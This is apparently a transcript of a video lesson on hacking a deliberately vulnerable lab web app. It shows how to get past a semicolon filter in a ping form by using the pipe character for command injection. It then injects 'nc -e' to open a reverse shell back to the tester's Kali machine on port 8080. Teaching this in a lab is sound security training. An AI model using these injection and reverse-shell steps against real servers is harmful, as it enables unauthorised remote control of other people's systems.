Okay, now that we managed to execute commands on the server using the low security settings, let's see if we can set it up to medium and if we can do the same after increasing the security. So we covered the basic case, and now I'm going to go to security and I'm going to set the security level to medium. I'm going to submit this. Then we're going to go back to our command execution. And I'm going to input my IP. Now, I just want to note that my IP is different now. If you notice that the IP of the server right now is 209 and my machine IP is 208. If I do ifconfig, you can see that the IP of my Kali machine is 208. So I'm going to try to ping the Kali machine. Let's just first see if we can ping something. So we're assuming that we don't know this website. And again, this is going from a black box point of view, so we're not going to look at the source code. So we're just going to run. This website's telling us it's going to ping stuff for us. So I'm just going to put the IP of the Kali and see if the ping works. So we're just going to put 10. And as you can see now, the ping command is working. Now let's see and try to do what we did before. So we put the IP and then we use the semicolon to say that run this command and this command. And in the low security settings, this used to work for us. So we're going to submit this. And at the bottom, it should show us our current working directory because we have the pwd here. So I'm submitting this. And as you can see, nothing got executed. So not even the ping command got executed. So again, looking from a black box point of view, we're going to think, oh, maybe they're using some sort of filtering on the semicolon. So they're checking if the command contains a semicolon, then they're going to ignore that command and not run it. So we're just going to try to use another trick, something similar to the semicolon. So what we used to do before, we had an example of doing ls. So that's the list command, and the pwd is what shows the working directory. And we can combine these two by doing ls, semicolon, and then we do the pwd. And that will do both. It will do the ls and the pwd. So that way used to work for us doesn't work anymore because they're probably filtering based on this specific character. So what we're going to do is we're going to use something else available for us in the Unix commands, which is the pipe. So piping is really useful when it comes to Unix. You'll use it a lot. What it basically does, it means run the first command, and once you run that command, send the output or pipe the output to this command and run the second command on it. So essentially, it'll run two commands in our case. Now, you can use pipe for a lot of things, and it's used into regex and things like that. For us, all we want to do is we're interested into getting the second command to run. So let's have an example of this. So we're going to do ls, which is going to be similar to our ping. And then we're going to put the pipe character, which is the vertical bar. And then we're going to put the second command that the ls output should be passed to. Now, pwd doesn't expect any input to be passed to it. So at the moment when we run this, it'll basically run both, but it won't show you the result of running ls. It'll feed it to pwd and show you the result of pwd. So when I hit enter, you'll see that pwd got executed. So in our example, what's happening is we have a ping. Then we're inputting our IP, so we're going to put our IP. And then we're going to use the bar character, and we're going to put the second command that we want to run, which will be the command that will give us shell on the server. But for the testing, we're just going to do a pwd. And again, as you can see, we don't see the result of the ping. We only see the result of the pwd. Because again, for the third time, this command, it will run this and feed the output to pwd. So let's try this in here. So we're going to put our IP again, like we did before. And we used to put pwd like that, but I'm just going to put my bar character. Hit enter. And as you can see, the second command got executed and we got our current working directory. Now we can modify this to get a shell on our computer. So again, we're going to use the bar, and we're going to get it to, we're going to use the exact same method that we used last time. So we're going to do nc -e, input my IP, and then I'm going to put the port, which is 8080. Now, before I execute this, I'm going to listen on port 8080 for a connection here, and we're going to use the same command like before, use a netcat. So nc vv lp 8080. This is listening, and we're going to connect back from here to the Kali, hit submit, and sure enough, we get a connection here that allows us to run any command we want on the server. So we can do pwd now, we can list the files, we can get our ID, or do anything we want on the current server. So we basically managed to gain access to that website.